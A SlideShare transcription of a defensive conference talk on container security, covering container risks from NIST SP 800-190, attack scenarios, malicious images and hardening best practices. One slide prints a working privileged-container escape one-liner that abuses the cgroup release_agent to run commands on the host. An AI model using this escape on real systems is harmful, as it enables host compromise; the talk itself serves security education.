SlideShare a Scribd company logo
Container Security
Jie @ InfoSec2020
Nov/02/2020
curl -X GET https://2130706433/info
{
“Name”:
“Jie”,
“Experience”: [
“IBM Security”,
“Qualcomm”,
“National Center of High-Performance Computing”],
“Certification”: [
“CCIE #50382”,
“OSCP”,
“CEH”]
} https://www.linkedin.com/in/jieliau
https://github.com/jieliau
https://www.facebook.com/jie.liau
https://twitter.com/0xJieLiau
https://medium.com/@liau.weijie
Gartner predicts that by 2023,
70% of organizations will be running three or more containerized applications in production
?
Infrastructure
Hypervisor
Guest OS Guest OS Guest OS
Bin/Lib Bin/Lib Bin/Lib
App1 App2 App2
Infrastructure
Host OS
Bin/Lib Bin/Lib Bin/Lib
App1 App2 App3
Container Engineer
Virtual Machine Virtual Machine Virtual Machine
Containerized
Application
Containerized
Application
Containerized
Application
Open Container Initiative - OCI
• Runtime Spec
• namespace
• cgroups
• Image Spec
• Layer
• Image index
• Configuration
Security Issues
Host OS Risk
Orchestration System Risks Image Risks
Container Runtime RisksRegistry Risks
•Improper user access rights
•OS vulnerabilities
•Unbounded admin access
•Weak or unmanaged credentials
•Unmanaged inter-container network
traffic
•Mixed of workload sensitivity levels
•Insecure connections to registries
•Stale images in registries
•Image vulnerabilities
•Image configuration
•Embedded malware
•Embedded secrets
•Image trust
•Vulnerabilities within the runtime
software
•Unbounded network access from
containers
•Insecure container runtime
configurations
•Shared kernel
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-190.pdf
Container escape to the host
Container should not run as root
Use non-root user in your Dockerfile
Privileged Container is so Bad
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
https://twitter.com/_fel1x/status/1151487051986087936
Bad Image
Open Docker API
Docker host
Client Host
Geek
Attack Scenario I
Vulnerable Container
1. Attack vulnerable container
2. Compromise the host
Docker Host or K8s Cluster
Attack Scenario II
Bad Container
1. Push bad image
2. Deploy by admin
3. Create bad container
Docker Host or K8s cluster
Attack Scenario III
Privileged Container
1. Find out open docker host
2. Create privileged container
3. Compromise the host
Open Docker Host
Bad Image for Cryptocurrency Mining
https://www.trendmicro.com/vinfo/tw/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining
Kinsing Malware Attacks Targeting Container Env
https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability
BestPractices
• Always use the most up to date version of Docker
• Allow only trusted users control of the Docker daemon by making sure only trusted users are members of Docker group
• Run your containers as a non-root user (UID not 0)
• Use only trusted base images when building your containers
• Use minimal base images that don’t include unnecessary software packages that could lead to a larger attack surface
• Don’t store secrets in images/Dockerfiles
• When running containers, remove all capabilities not required for the container to function as needed
• Don’t run containers with –privileged flag
• Don’t mount sensitive host system directories on containers, especially in writable mode that could expose them to being changed maliciously in a way
that could lead to host compromise
• Don’t run sshd within containers
• Don’t map any ports below 1024 within a container as they are considered privileged because they transmit sensitive data
• Make sure you have rules in place that give you an audit trail for:
• Docker daemon and Docker files and directories:
• /var/lib/docker
• /etc/docker
• docker.service
• docker.socket
• /etc/default/docker
• /etc/docker/daemon.json
• /etc/sysconfig/docker
• /usr/bin/containerd
• /usr/sbin/runc https://www.stackrox.com/post/2019/09/docker-security-101/
CAP-ADD instead of Privileged
• —cap-add
• SYS_ADMIN
• NET_ADMIN
• MAC_ADMIN
• NET_RAW
• SYS_TIME
• SYSLOG
• …
https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities
Limit Resource Usage
• —memory
• —cpus
• —cpu-period
• —pids-limit
• —kernel-memory
• —device-read-bps
• —device-read-ios
• —device-write-bgp
• —device-write-ios
https://docs.docker.com/config/containers/resource_constraints/
Open Source Tools for Docker Security
• Docker Bench for Security
• Clair
• Cilium
• Anchore
• OpenSCAP Workbench
• Dagda
• Notary
• Grafaes
• Sysdig Falco
• Banyanops Collector
https://techbeacon.com/security/10-top-open-source-tools-docker-security
Container Visibility is So Damn Important
https://blog.gigamon.com/2019/09/19/if-you-dont-have-container-visibility-your-organization-is-at-risk/
https://github.com/sysflow-telemetry
References
• https://www.stackrox.com/post/2020/03/6-container-adoption-trends-of-2020/
• https://www.docker.com/blog/containers-replacing-virtual-machines/
• https://blog.aquasec.com/cve-2016-9962-run-container-run
• https://medium.com/@mccode/processes-in-containers-should-not-run-as-
root-2feae3f0df3b
• https://containerjournal.com/topics/container-security/why-running-a-privileged-
container-is-not-a-good-idea/
• https://docs.docker.com/engine/api/
• https://docs.docker.com/engine/api/v1.40/#operation/ContainerCreate
• https://www.trendmicro.com/vinfo/tw/security/news/virtualization-and-cloud/
malicious-docker-hub-container-images-cryptocurrency-mining
• https://docs.docker.com/config/containers/resource_constraints/
• https://techbeacon.com/security/10-top-open-source-tools-docker-security
ThankYou!!!

More Related Content

What's hot

Kubernetes and container security
Kubernetes and container securityKubernetes and container security
Kubernetes and container security
Volodymyr Shynkar
 

What's hot (20)

Container Runtime Security with Falco
Container Runtime Security with FalcoContainer Runtime Security with Falco
Container Runtime Security with Falco
 
Docker introduction
Docker introductionDocker introduction
Docker introduction
 
Docker Security Overview
Docker Security OverviewDocker Security Overview
Docker Security Overview
 
Kubernetes and container security
Kubernetes and container securityKubernetes and container security
Kubernetes and container security
 
Kubernetes: A Short Introduction (2019)
Kubernetes: A Short Introduction (2019)Kubernetes: A Short Introduction (2019)
Kubernetes: A Short Introduction (2019)
 
Podman Overview and internals.pdf
Podman Overview and internals.pdfPodman Overview and internals.pdf
Podman Overview and internals.pdf
 
Docker Basics
Docker BasicsDocker Basics
Docker Basics
 
K8s security best practices
K8s security best practicesK8s security best practices
K8s security best practices
 
Introduction to container based virtualization with docker
Introduction to container based virtualization with dockerIntroduction to container based virtualization with docker
Introduction to container based virtualization with docker
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Docker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and securityDocker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and security
 
Docker intro
Docker introDocker intro
Docker intro
 
Kubernetes security
Kubernetes securityKubernetes security
Kubernetes security
 
containerd the universal container runtime
containerd the universal container runtimecontainerd the universal container runtime
containerd the universal container runtime
 
Kubernetes 101 for_penetration_testers_-_null_mumbai
Kubernetes 101 for_penetration_testers_-_null_mumbaiKubernetes 101 for_penetration_testers_-_null_mumbai
Kubernetes 101 for_penetration_testers_-_null_mumbai
 
DevOps with Kubernetes
DevOps with KubernetesDevOps with Kubernetes
DevOps with Kubernetes
 
Container Security
Container SecurityContainer Security
Container Security
 
Introduction to helm
Introduction to helmIntroduction to helm
Introduction to helm
 
OpenShift-Technical-Overview.pdf
OpenShift-Technical-Overview.pdfOpenShift-Technical-Overview.pdf
OpenShift-Technical-Overview.pdf
 
Kubernetes 101 - an Introduction to Containers, Kubernetes, and OpenShift
Kubernetes 101 - an Introduction to Containers, Kubernetes, and OpenShiftKubernetes 101 - an Introduction to Containers, Kubernetes, and OpenShift
Kubernetes 101 - an Introduction to Containers, Kubernetes, and OpenShift
 

Similar to Container Security

ContainerConf 2022: Hijack Kubernetes
ContainerConf 2022: Hijack KubernetesContainerConf 2022: Hijack Kubernetes
ContainerConf 2022: Hijack Kubernetes
Nico Meisenzahl
 
Contain your risk: Deploy secure containers with trust and confidence
Contain your risk: Deploy secure containers with trust and confidenceContain your risk: Deploy secure containers with trust and confidence
Contain your risk: Deploy secure containers with trust and confidence
Black Duck by Synopsys
 
Finding Your Way in Container Security
Finding Your Way in Container SecurityFinding Your Way in Container Security
Finding Your Way in Container Security
Ksenia Peguero
 

Similar to Container Security (20)

Container Days: Hijack a Kubernetes Cluster - a Walkthrough
Container Days: Hijack a Kubernetes Cluster - a WalkthroughContainer Days: Hijack a Kubernetes Cluster - a Walkthrough
Container Days: Hijack a Kubernetes Cluster - a Walkthrough
 
ContainerConf 2022: Hijack Kubernetes
ContainerConf 2022: Hijack KubernetesContainerConf 2022: Hijack Kubernetes
ContainerConf 2022: Hijack Kubernetes
 
Hijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a WalkthroughHijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a Walkthrough
 
Develop Azure compute solutions Part - 2
Develop Azure compute solutions Part - 2Develop Azure compute solutions Part - 2
Develop Azure compute solutions Part - 2
 
Security Patterns for Microservice Architectures - ADTMag Microservices & API...
Security Patterns for Microservice Architectures - ADTMag Microservices & API...Security Patterns for Microservice Architectures - ADTMag Microservices & API...
Security Patterns for Microservice Architectures - ADTMag Microservices & API...
 
Secure your Azure Web App 2019
Secure your Azure Web App 2019Secure your Azure Web App 2019
Secure your Azure Web App 2019
 
Hijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a WalkthroughHijack a Kubernetes Cluster - a Walkthrough
Hijack a Kubernetes Cluster - a Walkthrough
 
Tips and best practices for Docker
Tips and best practices for DockerTips and best practices for Docker
Tips and best practices for Docker
 
Secure your web app presentation
Secure your web app presentationSecure your web app presentation
Secure your web app presentation
 
Security Patterns for Microservice Architectures - London Java Community 2020
Security Patterns for Microservice Architectures - London Java Community 2020Security Patterns for Microservice Architectures - London Java Community 2020
Security Patterns for Microservice Architectures - London Java Community 2020
 
Road to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoopsRoad to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoops
 
Contain your risk: Deploy secure containers with trust and confidence
Contain your risk: Deploy secure containers with trust and confidenceContain your risk: Deploy secure containers with trust and confidence
Contain your risk: Deploy secure containers with trust and confidence
 
Security Patterns for Microservice Architectures - Oktane20
Security Patterns for Microservice Architectures - Oktane20Security Patterns for Microservice Architectures - Oktane20
Security Patterns for Microservice Architectures - Oktane20
 
Native Cloud-Native: Building Agile Microservices with the Micronaut Framework
Native Cloud-Native: Building Agile Microservices with the Micronaut FrameworkNative Cloud-Native: Building Agile Microservices with the Micronaut Framework
Native Cloud-Native: Building Agile Microservices with the Micronaut Framework
 
Microservices in the Enterprise
Microservices in the Enterprise Microservices in the Enterprise
Microservices in the Enterprise
 
How to Prevent Your Kubernetes Cluster From Being Hacked
How to Prevent Your Kubernetes Cluster From Being HackedHow to Prevent Your Kubernetes Cluster From Being Hacked
How to Prevent Your Kubernetes Cluster From Being Hacked
 
Secure Your Code Implement DevSecOps in Azure
Secure Your Code Implement DevSecOps in AzureSecure Your Code Implement DevSecOps in Azure
Secure Your Code Implement DevSecOps in Azure
 
Finding Your Way in Container Security
Finding Your Way in Container SecurityFinding Your Way in Container Security
Finding Your Way in Container Security
 
Understanding docker ecosystem and vulnerabilities points
Understanding docker ecosystem and vulnerabilities pointsUnderstanding docker ecosystem and vulnerabilities points
Understanding docker ecosystem and vulnerabilities points
 
Docker Security
Docker SecurityDocker Security
Docker Security
 

More from Jie Liau (9)

iThome_CYBERSEC2024_Drive_Into_the_DarkWeb
iThome_CYBERSEC2024_Drive_Into_the_DarkWebiThome_CYBERSEC2024_Drive_Into_the_DarkWeb
iThome_CYBERSEC2024_Drive_Into_the_DarkWeb
 
OWASPAPISecurity
OWASPAPISecurityOWASPAPISecurity
OWASPAPISecurity
 
HowYourAPIBeMyAPI
HowYourAPIBeMyAPIHowYourAPIBeMyAPI
HowYourAPIBeMyAPI
 
iThome CyberSec2021 Container Security
iThome CyberSec2021 Container SecurityiThome CyberSec2021 Container Security
iThome CyberSec2021 Container Security
 
Protecting Your Internet Route Integrity
Protecting Your Internet Route IntegrityProtecting Your Internet Route Integrity
Protecting Your Internet Route Integrity
 
The Tor Network
The Tor NetworkThe Tor Network
The Tor Network
 
IBM X-Force Threat Intelligence Index 2017
IBM X-Force Threat Intelligence Index 2017IBM X-Force Threat Intelligence Index 2017
IBM X-Force Threat Intelligence Index 2017
 
DDoS
DDoSDDoS
DDoS
 
Shell Shock
Shell ShockShell Shock
Shell Shock
 

Recently uploaded

Recently uploaded (20)

Exploring UiPath Orchestrator API: updates and limits in 2024 🚀
Exploring UiPath Orchestrator API: updates and limits in 2024 🚀Exploring UiPath Orchestrator API: updates and limits in 2024 🚀
Exploring UiPath Orchestrator API: updates and limits in 2024 🚀
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
Agentic RAG What it is its types applications and implementation.pdf
Agentic RAG What it is its types applications and implementation.pdfAgentic RAG What it is its types applications and implementation.pdf
Agentic RAG What it is its types applications and implementation.pdf
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
 
In-Depth Performance Testing Guide for IT Professionals
In-Depth Performance Testing Guide for IT ProfessionalsIn-Depth Performance Testing Guide for IT Professionals
In-Depth Performance Testing Guide for IT Professionals
 
Introduction to Open Source RAG and RAG Evaluation
Introduction to Open Source RAG and RAG EvaluationIntroduction to Open Source RAG and RAG Evaluation
Introduction to Open Source RAG and RAG Evaluation
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
UiPath Test Automation using UiPath Test Suite series, part 1
UiPath Test Automation using UiPath Test Suite series, part 1UiPath Test Automation using UiPath Test Suite series, part 1
UiPath Test Automation using UiPath Test Suite series, part 1
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya HalderCustom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
 
SOQL 201 for Admins & Developers: Slice & Dice Your Org’s Data With Aggregate...
SOQL 201 for Admins & Developers: Slice & Dice Your Org’s Data With Aggregate...SOQL 201 for Admins & Developers: Slice & Dice Your Org’s Data With Aggregate...
SOQL 201 for Admins & Developers: Slice & Dice Your Org’s Data With Aggregate...
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
PLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. StartupsPLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. Startups
 
"Impact of front-end architecture on development cost", Viktor Turskyi
"Impact of front-end architecture on development cost", Viktor Turskyi"Impact of front-end architecture on development cost", Viktor Turskyi
"Impact of front-end architecture on development cost", Viktor Turskyi
 
The architecture of Generative AI for enterprises.pdf
The architecture of Generative AI for enterprises.pdfThe architecture of Generative AI for enterprises.pdf
The architecture of Generative AI for enterprises.pdf
 
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxUnpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
 
Demystifying gRPC in .Net by John Staveley
Demystifying gRPC in .Net by John StaveleyDemystifying gRPC in .Net by John Staveley
Demystifying gRPC in .Net by John Staveley
 

Container Security

  • 1. Container Security Jie @ InfoSec2020 Nov/02/2020
  • 2. curl -X GET https://2130706433/info { “Name”: “Jie”, “Experience”: [ “IBM Security”, “Qualcomm”, “National Center of High-Performance Computing”], “Certification”: [ “CCIE #50382”, “OSCP”, “CEH”] } https://www.linkedin.com/in/jieliau https://github.com/jieliau https://www.facebook.com/jie.liau https://twitter.com/0xJieLiau https://medium.com/@liau.weijie
  • 3. Gartner predicts that by 2023, 70% of organizations will be running three or more containerized applications in production
  • 4. ?
  • 5. Infrastructure Hypervisor Guest OS Guest OS Guest OS Bin/Lib Bin/Lib Bin/Lib App1 App2 App2 Infrastructure Host OS Bin/Lib Bin/Lib Bin/Lib App1 App2 App3 Container Engineer Virtual Machine Virtual Machine Virtual Machine Containerized Application Containerized Application Containerized Application
  • 6. Open Container Initiative - OCI • Runtime Spec • namespace • cgroups • Image Spec • Layer • Image index • Configuration
  • 7.
  • 8.
  • 9.
  • 11. Host OS Risk Orchestration System Risks Image Risks Container Runtime RisksRegistry Risks •Improper user access rights •OS vulnerabilities •Unbounded admin access •Weak or unmanaged credentials •Unmanaged inter-container network traffic •Mixed of workload sensitivity levels •Insecure connections to registries •Stale images in registries •Image vulnerabilities •Image configuration •Embedded malware •Embedded secrets •Image trust •Vulnerabilities within the runtime software •Unbounded network access from containers •Insecure container runtime configurations •Shared kernel https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-190.pdf
  • 13. Container should not run as root Use non-root user in your Dockerfile
  • 14. Privileged Container is so Bad d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release t=`sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o https://twitter.com/_fel1x/status/1151487051986087936
  • 16. Open Docker API Docker host Client Host Geek
  • 17. Attack Scenario I Vulnerable Container 1. Attack vulnerable container 2. Compromise the host Docker Host or K8s Cluster
  • 18. Attack Scenario II Bad Container 1. Push bad image 2. Deploy by admin 3. Create bad container Docker Host or K8s cluster
  • 19. Attack Scenario III Privileged Container 1. Find out open docker host 2. Create privileged container 3. Compromise the host Open Docker Host
  • 20. Bad Image for Cryptocurrency Mining https://www.trendmicro.com/vinfo/tw/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining
  • 21. Kinsing Malware Attacks Targeting Container Env https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability
  • 22.
  • 24. • Always use the most up to date version of Docker • Allow only trusted users control of the Docker daemon by making sure only trusted users are members of Docker group • Run your containers as a non-root user (UID not 0) • Use only trusted base images when building your containers • Use minimal base images that don’t include unnecessary software packages that could lead to a larger attack surface • Don’t store secrets in images/Dockerfiles • When running containers, remove all capabilities not required for the container to function as needed • Don’t run containers with –privileged flag • Don’t mount sensitive host system directories on containers, especially in writable mode that could expose them to being changed maliciously in a way that could lead to host compromise • Don’t run sshd within containers • Don’t map any ports below 1024 within a container as they are considered privileged because they transmit sensitive data • Make sure you have rules in place that give you an audit trail for: • Docker daemon and Docker files and directories: • /var/lib/docker • /etc/docker • docker.service • docker.socket • /etc/default/docker • /etc/docker/daemon.json • /etc/sysconfig/docker • /usr/bin/containerd • /usr/sbin/runc https://www.stackrox.com/post/2019/09/docker-security-101/
  • 25. CAP-ADD instead of Privileged • —cap-add • SYS_ADMIN • NET_ADMIN • MAC_ADMIN • NET_RAW • SYS_TIME • SYSLOG • … https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities
  • 26. Limit Resource Usage • —memory • —cpus • —cpu-period • —pids-limit • —kernel-memory • —device-read-bps • —device-read-ios • —device-write-bgp • —device-write-ios https://docs.docker.com/config/containers/resource_constraints/
  • 27. Open Source Tools for Docker Security • Docker Bench for Security • Clair • Cilium • Anchore • OpenSCAP Workbench • Dagda • Notary • Grafaes • Sysdig Falco • Banyanops Collector https://techbeacon.com/security/10-top-open-source-tools-docker-security
  • 28.
  • 29. Container Visibility is So Damn Important https://blog.gigamon.com/2019/09/19/if-you-dont-have-container-visibility-your-organization-is-at-risk/
  • 32. • https://www.stackrox.com/post/2020/03/6-container-adoption-trends-of-2020/ • https://www.docker.com/blog/containers-replacing-virtual-machines/ • https://blog.aquasec.com/cve-2016-9962-run-container-run • https://medium.com/@mccode/processes-in-containers-should-not-run-as- root-2feae3f0df3b • https://containerjournal.com/topics/container-security/why-running-a-privileged- container-is-not-a-good-idea/ • https://docs.docker.com/engine/api/ • https://docs.docker.com/engine/api/v1.40/#operation/ContainerCreate • https://www.trendmicro.com/vinfo/tw/security/news/virtualization-and-cloud/ malicious-docker-hub-container-images-cryptocurrency-mining • https://docs.docker.com/config/containers/resource_constraints/ • https://techbeacon.com/security/10-top-open-source-tools-docker-security